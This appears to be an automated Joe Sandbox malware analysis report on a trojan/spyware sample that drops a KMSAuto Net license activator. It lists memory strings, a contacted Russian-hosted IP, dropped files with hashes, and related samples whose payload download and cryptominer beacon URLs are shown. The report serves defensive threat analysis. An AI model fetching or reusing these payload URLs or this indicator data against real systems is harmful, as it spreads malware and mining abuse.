                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameKMSAuto Net.exe, 00000002.00000002.516542366.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sakkal.comKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/Y0aKMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sandoll.co.krAKMSAuto Net.exe, 00000002.00000003.266039290.0000000005D09000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/ZKMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.apache.org/licenses/LICENSE-2.0KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.comKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://ocsp.thawte.com0ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002217000.00000004.00001000.00020000.00000000.sdmp, ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/MKMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.tiro.comnKMSAuto Net.exe, 00000002.00000003.265139659.0000000005D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://keepass.info/ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exefalse
                                                  		high
                                                  http://upx.sf.netAmcache.hve.4.drfalse
                                                    		high
                                                    http://www.youtube.com/results?search_query=%22KMSAuto%20Net%202015%22KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drfalse
                                                      		high
                                                      http://www.fontbureau.comaKMSAuto Net.exe, 00000002.00000002.519780552.0000000005D00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fonts.comWKMSAuto Net.exe, 00000002.00000003.264730443.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264689563.0000000005D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.carterandcone.comlKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/itoKMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cn/KMSAuto Net.exe, 00000002.00000003.267584430.0000000005D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlNKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cnKMSAuto Net.exe, 00000002.00000003.267182751.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://cp.sprinthost.rucsrss.exe, 00000001.00000003.255564669.0000000002E04000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.274376515.0000000002E0C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255583166.0000000002E08000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designers/frere-jones.htmlKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://goo.gl/eD7s9XShowWindowDominicanKMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drfalse
                                                              		high
                                                              http://goo.gl/eD7s9XgKMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drfalse
                                                                		high
                                                                http://www.jiyu-kobo.co.jp/KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.founder.c#KMSAuto Net.exe, 00000002.00000003.267584430.0000000005D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers8KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.jiyu-kobo.co.jp/bKMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  141.8.192.151
                                                                  		f0355889.xsph.ruRussian Federation
                                                                  		35278SPRINTHOSTRUfalse

                                                                  General Information

                                                                  Joe Sandbox Version:37.0.0 Beryl
                                                                  Analysis ID:834745
                                                                  Start date and time:2023-03-25 14:26:09 +01:00
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 9m 38s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:23
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample file name:ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@15/12@1/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 33.3%
                                                                  HDC Information:
                                                                  • Successful, ratio: 100% (good quality ratio 50%)
                                                                  • Quality average: 21%
                                                                  • Quality standard deviation: 12%
                                                                  HCA Information:
                                                                  • Successful, ratio: 76%
                                                                  • Number of executed functions: 20
                                                                  • Number of non-executed functions: 11
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                  • Execution Graph export aborted for target ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, PID 4204 because there are no executed function
                                                                  • Execution Graph export aborted for target csrss.exe, PID 5224 because there are no executed function
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  14:27:15API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  141.8.192.151gOKMPhOLiN.exeGet hashmaliciousPhoenix Miner, ccminerBrowse
                                                                  • f0758246.xsph.ru//zima.php?mine=ETC
                                                                  DWG Material, Standard BS 4360 GR. 40A43A.jarGet hashmaliciousUnknownBrowse
                                                                  • f0719949.xsph.ru/dropbox.exe
                                                                  DWG Material, Standard BS 4360 GR. 40A43A.jarGet hashmaliciousUnknownBrowse
                                                                  • f0719949.xsph.ru/dropbox.exe
                                                                  dropbox.exeGet hashmaliciousUnknownBrowse
                                                                  • f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
                                                                  DWG spare parts 455RTMGF Model.exeGet hashmaliciousRemcosBrowse
                                                                  • f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
                                                                  NotaFiscal.msiGet hashmaliciousUnknownBrowse
                                                                  • f0717271.xsph.ru/serv.php
                                                                  Revised sales contract for Crosswear.rtfGet hashmaliciousSnake KeyloggerBrowse
                                                                  • f0705964.xsph.ru/mum.exe
                                                                  cxbqjWw79R.exeGet hashmaliciousXmrigBrowse
                                                                  • f0702521.xsph.ru/cmd.php?hwid=computer%5Cuser&gpuname=88P9A4OS;%20&mining=1&active=XMR
                                                                  IVBPFW.exeGet hashmaliciousUnknownBrowse
                                                                  • f0702055.xsph.ru/ng.txt
                                                                  NOPL-25-JULY-001.docGet hashmaliciousRemcosBrowse
                                                                  • f0699262.xsph.ru/letter.exe
                                                                  300618c6e81ee458a3aba4188f0f24937f62974991428.exeGet hashmaliciousRedLine, Remcos, XmrigBrowse
                                                                  • f0699616.xsph.ru/RATTCRYPT.exe
                                                                  http://f0688845.xsph.ru/index.phpGet hashmaliciousUnknownBrowse
                                                                  • f0688845.xsph.ru/favicon.ico
                                                                  18561381.exeGet hashmaliciousRedLineBrowse
                                                                  • f0645594.xsph.ru/build.exe
                                                                  bd250e1cb4f8d322a5464549dc067ac7bcbecfc2d4fca.exeGet hashmaliciousRedLine Remcos XmrigBrowse
                                                                  • f0641877.xsph.ru/lam1di.exe
                                                                  9WPRwZwY47.exeGet hashmaliciousRedLineBrowse
                                                                  • f0624763.xsph.ru/MicrosoftApi.exe
                                                                  2a09Y5NsoG.exeGet hashmaliciousAmadey RedLine SmokeLoader Tofsee VidarBrowse
                                                                  • f0611101.xsph.ru/1.exe
                                                                  NFe_09112021123.msiGet hashmaliciousHidden Macro 4.0Browse
                                                                  • f0589562.xsph.ru//arqvs//zlibai.dll
                                                                  VapeV4Installer (2).exeGet hashmaliciousUnknownBrowse
                                                                  • f0587499.xsph.ru/dop.exe
                                                                  7ofFMoirr5.exeGet hashmaliciousRaccoon RedLine SmokeLoaderBrowse
                                                                  • f0589056.xsph.ru/bfs.exe
                                                                  SecuriteInfo.com.W32.AIDetect.malware1.10225.exeGet hashmaliciousRaccoon RedLine SmokeLoaderBrowse
                                                                  • f0589056.xsph.ru/bfs.exe

                                                                  Domains

                                                                  No context

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  SPRINTHOSTRU9943942BF1ECA23FF0436ACD54810DC44DFF46CA3A8AC.exeGet hashmaliciousDCRatBrowse
                                                                  • 141.8.197.42
                                                                  SecuriteInfo.com.Win32.CrypterX-gen.30319.24724.exeGet hashmaliciousStealc, VidarBrowse
                                                                  • 185.251.91.202
                                                                  5616zRamIw.exeGet hashmaliciousStealc, VidarBrowse
                                                                  • 185.251.91.202
                                                                  2SvK6hF5uE.exeGet hashmaliciousStealc, VidarBrowse
                                                                  • 185.251.91.202
                                                                  LuI6373nrb.exeGet hashmaliciousStealc, VidarBrowse
                                                                  • 185.251.91.202
                                                                  J5hFvhir0S.exeGet hashmaliciousDCRatBrowse
                                                                  • 141.8.192.82
                                                                  file.exeGet hashmaliciousTofseeBrowse
                                                                  • 185.185.68.239
                                                                  file.exeGet hashmaliciousTofseeBrowse
                                                                  • 185.185.68.239
                                                                  file.exeGet hashmaliciousTofseeBrowse
                                                                  • 185.185.68.239
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • 141.8.195.45
                                                                  wQNd0uhGFZ.exeGet hashmaliciousStealc, VidarBrowse
                                                                  • 185.185.68.241
                                                                  bER7DKZrkI.exeGet hashmaliciousDCRatBrowse
                                                                  • 141.8.192.169
                                                                  OG8UFPwwKq.exeGet hashmaliciousDCRatBrowse
                                                                  • 141.8.192.169
                                                                  file.exeGet hashmaliciousTofseeBrowse
                                                                  • 185.251.88.202
                                                                  file.exeGet hashmaliciousTofseeBrowse
                                                                  • 185.251.88.202
                                                                  https://envireaupuits-my.sharepoint.com/:u:/p/rmccormack/Efpu6Jmv2ftGi2xFsVeWXwwB7B62gSLU6hU9cVLt-LpvCQGet hashmaliciousUnknownBrowse
                                                                  • 141.8.194.239
                                                                  qkmDErEpoW.exeGet hashmaliciousDCRatBrowse
                                                                  • 141.8.194.242
                                                                  drB8pR4ekw.exeGet hashmaliciousDCRatBrowse
                                                                  • 141.8.194.164
                                                                  T8xr0o2njQ.exeGet hashmaliciousDCRatBrowse
                                                                  • 141.8.194.242
                                                                  SEjk15RsUj.exeGet hashmaliciousDCRatBrowse
                                                                  • 141.8.194.242

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):8767160
                                                                  Entropy (8bit):7.066286542185662
                                                                  Encrypted:false
                                                                  SSDEEP:196608:wokKDywCAfywOweBzcyw3ywsywDywPbywgsywZywRywxywBywEyw4ywwywmIBywI:FywCAqwUBzBwiwxwGwPewgxwUwswMw84
                                                                  MD5:2FB86BE791B4BB4389E55DF0FEC04EB7
                                                                  SHA1:375DC8189059602F9EB571B473D723FAD3AD3D8C
                                                                  SHA-256:B8AEC57F7E9C193FCD9796CF22997605624B8B5F9BF5F0C6190E1090D426EE31
                                                                  SHA-512:3230AB05EB876879AEFC5E15BB726292640C1DDF476E4108F5C8EED2F373CB852964163CCB006E3D22BC1DC2F97AC2DB391AF9B289F21A7B099DF4C4DD94EE38
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  Reputation:low
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S.FX.........."...P.............".... ... ....@.. ..............................jl....`.....................................O.... ..<............................................................................ ............... ..H............text...(... ...................... ..`.rsrc...<.... ......................@..@.reloc..............................@..B........................H.......p%..x"...........G..h.z.P.......................................Z(....(....(.....o....*...( .....(!.....(".....(#.....($...*F.(....o....(%...*..(&...*.s'........s(........s)........s*........s+........*.~....o,...*.~....o-...*.~....o....*.~....o/...*.~....o0...*.~.....(1...,.r...p.....(2...o3...s4........~....*.~....*.......*~(....r-..p~....o5...(6...t....*~(....r?..p~....o5...(6...t....*~(....rG..p~....o5...(6...t....*~(....rW..p~....o5...(6...t....*~(....rg..p~....o

                                                                  C:\Program Files (x86)\KMSAuto\KMSAuto Net\test.test

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):6
                                                                  Entropy (8bit):2.2516291673878226
                                                                  Encrypted:false
                                                                  SSDEEP:3:Hy:Hy
                                                                  MD5:9F06243ABCB89C70E0C331C61D871FA7
                                                                  SHA1:FDE773A18BB29F5ED65E6F0A7AA717FD1FA485D4
                                                                  SHA-256:837CCB607E312B170FAC7383D7CCFD61FA5072793F19A25E75FBACB56539B86B
                                                                  SHA-512:B947B99D1BADDD347550C9032E9AB60B6BE56551CF92C076B38E4E11F436051A4AF51C47E54F8641316A720B043641A3B3C1E1B01BA50445EA1BA60BFD1B7A86
                                                                  Malicious:false
                                                                  Preview:test..

                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_csrss.exe_f22660799b81b1cdf575f7ba80bebda2d012813c_4666b2e0_0a75e935\Report.wer

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.9703695093460976
                                                                  Encrypted:false
                                                                  SSDEEP:192:iDpaOoQ9HF/69RjcPqe86/u7svS274ItiQ:i1VoQNFS9RjM/u7svX4ItiQ
                                                                  MD5:9651F04D850960647F97309303F0E260
                                                                  SHA1:887A00908DAF17CB86ED75568CD4FF540D57A21C
                                                                  SHA-256:E3DE4551AD2736C7091C78C723009EB008D4D017B55CB1827306E052FA20A26D
                                                                  SHA-512:75A386D7456CB4C788C0EEFCDD7A83F6B21D014EA992D1672870449DDEFF0D28A0229BB45736DC5179717E633C788FE91E9E1DDD297BDA1D2007966841624396
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: SUSP_WER_Suspicious_Crash_Directory, Description: Detects a crashed application executed in a suspicious directory, Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_csrss.exe_f22660799b81b1cdf575f7ba80bebda2d012813c_4666b2e0_0a75e935\Report.wer, Author: Florian Roth (Nextron Systems)
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.4.2.5.3.2.2.7.2.2.5.5.9.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.4.2.5.3.2.2.8.0.2.2.4.7.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.7.5.2.e.8.d.-.e.5.6.d.-.4.f.3.9.-.9.4.7.a.-.8.5.2.f.0.0.5.b.8.d.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.3.8.4.e.6.2.-.7.1.d.6.-.4.e.1.c.-.9.9.1.f.-.9.2.8.e.8.7.6.6.4.4.6.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.s.r.s.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.6.8.-.0.0.0.1.-.0.0.1.f.-.8.9.4.9.-.3.5.8.b.6.0.5.f.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.b.a.4.d.8.c.3.2.6.8.9.6.a.4.0.2.f.d.8.9.b.5.6.c.6.e.a.c.5.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.a.2.3.b.c.3.7.9.8.7.a.9.c.8.0.2.b.a.5.3.3.1.5.7.7.7.7.6.e.f.2.a.f.1.d.0.7.d.8.!.c.s.r.s.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.9.2././.

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERCAEF.tmp.dmp

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 14 streams, Sat Mar 25 21:27:07 2023, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):85762
                                                                  Entropy (8bit):1.9348886947876553
                                                                  Encrypted:false
                                                                  SSDEEP:384:5/UsRPweZ82SGMFKU5z0M/XHhvZjm6/Q5ZsZKd:5/9YeZ8jTz0odFvce
                                                                  MD5:1D10629EF8FF1A4211596938F06B2BC7
                                                                  SHA1:9F5FE6CB1FE590E02A9AB8F2F551F8A627FB60B8
                                                                  SHA-256:A03757BF415604A8DFF2182F5B9A66DECE1555EA3A1EB6B5151312A51611B37C
                                                                  SHA-512:06EBBB10F0C2E8EA761B86461F37530E2D7CB7CD1B70E69AC935C6A1C3C7431EDDBA8014A46555E21927696EFE1E2F3A9E506B4BA71E2CD8EE2EC398A943C19E
                                                                  Malicious:false
                                                                  Preview:MDMP....... .......+g.d........................`................C..........T.......8...........T............0...........................!...................................................................U...........B.......!......GenuineIntelW...........T.......h...(g.d.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD51.tmp.WERInternalMetadata.xml

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8320
                                                                  Entropy (8bit):3.694198497609073
                                                                  Encrypted:false
                                                                  SSDEEP:192:Rrl7r3GLNiyp6CV6Y0VZ6ekgmfCSYsjzCprB89bfeb/sfIlejm:RrlsNi86g6Y46NgmfCS/febkfOe6
                                                                  MD5:9C2F42B76BE2BF918ED18EE5DEC7D483
                                                                  SHA1:C6239ED6EBE726D61A61286F31F3BD986E2F4DF6
                                                                  SHA-256:38C842EAE184FFFE3939B215DA28C8D829D0103EBF3F6AC9BAE4A021C0454CFE
                                                                  SHA-512:BC0FA8F0B9328FE62D63849E22A70579BD468A832CFAE4C288F08ADAA698BA1FF07365212C19789B54515F12180FCBE5B6ACC2249D30F38759EE19DF943F5B66
                                                                  Malicious:false
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.2.4.<./.P.i.d.>.......

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERCDB0.tmp.xml

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4528
                                                                  Entropy (8bit):4.419731473106937
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwSD8zs8JgtWI99BWgc8sqYjB8fm8M4JKH/FRs+q8Q86zU15wd:uITf6iQgrsqYaJKsW6zm5wd
                                                                  MD5:9BD6B6AFDDD8100462915BDFBCEE269E
                                                                  SHA1:02C178C0F529CDF8BB3F312BAA2C0773DEFDAC3D
                                                                  SHA-256:77166162629EF7E8EFC6F1B6D731C1937A9D38C7508EB6B1E24BA9CA1C79FD2E
                                                                  SHA-512:F66D3330C11F0F5DA5A67CC60CE5CF8A238AA3E9259247CC726FDE6F66014A2540490CAFB390837C7901E7059BEE3986E4164D46708500C443AB54267A2F80DD
                                                                  Malicious:false
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1968877" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                  C:\Users\user\AppData\Local\MSfree Inc\kmsauto.ini

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1017
                                                                  Entropy (8bit):5.232381795490283
                                                                  Encrypted:false
                                                                  SSDEEP:24:UMyxmTedVspf1bZhTWY3GNd8DBSZXud7MwTiKUQsJQKDz6KmH6KZq:UMcmTer6f17Tf3GnmShK7MqiKUYKDuKT
                                                                  MD5:AF6A20FD7DFADCD582CCF2B1BFAAF82B
                                                                  SHA1:056B1DE541D17A522F2595D107A2CB3AAA71A570
                                                                  SHA-256:0BEE97833A70AA9BA271E93226DACE849836C64919FBFE15543D694E219D4AF2
                                                                  SHA-512:66510AA69C7F8D6ED34903E588949BDD2C74DC55D9C1192A7F335757A942B5B52FF2409114CEF1E588F2E05D9C7E0B88BEF396E51D57B704F9803B3ACFF76980
                                                                  Malicious:false
                                                                  Preview:.[Configuration]..Professional=no..AddFunctions=no..NoLogo=no..LogFile=yes..LogFileIP=yes..DebugMode=no..PositionLeft=76..PositionTop=49..TaskWinStatus=no..TaskOffStatus=no..Sounds=yes..DelKMSServer=yes..OfficeActivation=no..Port=1688..AI=43200..RI=43200..ModeAuto=yes..Host=127.0.0.2..Type=0..NoAutoMode=no..ModeHook=no..ModeWD=no..ModeTAP=no..DivertDel=hard..LHost=true..Hook=true..WDivert=true..TAP=true..AutoRes=no..NoAutoNoKMS=no..TAPType=..UsePgD=yes..HookMode=0..InstallKey=false..fakeip=false..Index1=0..Index2=0..Index3=0..Index4=7..Index5=0..Index6=0..Index7=0..Index44=0......[ComboBoxHost]..127.0.0.2..10.3.0.222..127.0.0.3......[ComboBoxWinePID]..RandomKMSPID..05426-00206-471-074136-03-1049-9200.0000-1302016......[ComboBoxOff10ePID]..RandomKMSPID..05426-00096-200-349822-03-1049-9200.0000-1102013......[ComboBoxOff13ePID]..RandomKMSPID..05426-00206-234-321799-03-1049-9200.0000-1202013......[ComboBoxOff16ePID]..RandomKMSPID..05426-00206-437-321799-03-1049-9200.0000-1402016......[Co

                                                                  C:\Users\user\AppData\Local\Temp\$inst\2.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
